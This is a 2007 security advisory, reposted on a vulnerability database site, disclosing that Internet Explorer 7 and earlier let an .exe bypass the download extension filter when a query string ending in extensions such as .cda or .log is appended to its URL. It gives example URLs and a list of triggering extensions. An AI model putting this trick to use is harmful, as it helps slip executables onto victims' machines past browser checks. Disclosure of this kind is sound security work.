Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18193
HistoryOct 15, 2007 - 12:00 a.m.

playing for fun with <=IE7

2007-10-1500:00:00
vulners.com
32

playing for fun with <=IE7
Impact: who knows …
Fix Available: no


1) Bug
2) Proof of concept
3)Conclusion

======
1) Bug

it's possible to bypass the extension filter of <=IE7 this can result by downloading
an arbitrary exe file

=====
2)proof of concept

let's take this exemple :
http://dams083.free.fr/tmp/putty.exe
this is simply putty .
you click on this and then you will be prompted for downloading the file.
but what about if we do :
http://dams083.free.fr/tmp/putty.exe?1.txt
… the .exe is showed.
now let's go a bit ahead :
http://dams083.free.fr/tmp/putty.exe?1.cda
wow my .exe is downloaded directly and located in temporary files ( and """opened""" by windows media player).
works with theses extension :
.log
.dif
.sol
.htt
.itpc
.itms
.dvr-ms
.dib
.asf
.tif
etc …

5) Conclusion

this is very funny , because actually it only works for .exe extensions.

.COM , .PIF , etc you CANT do this. ( overwrite the extension , and then bypass the filter)
i guess we can wonder what the heck.

regards laurent gaffié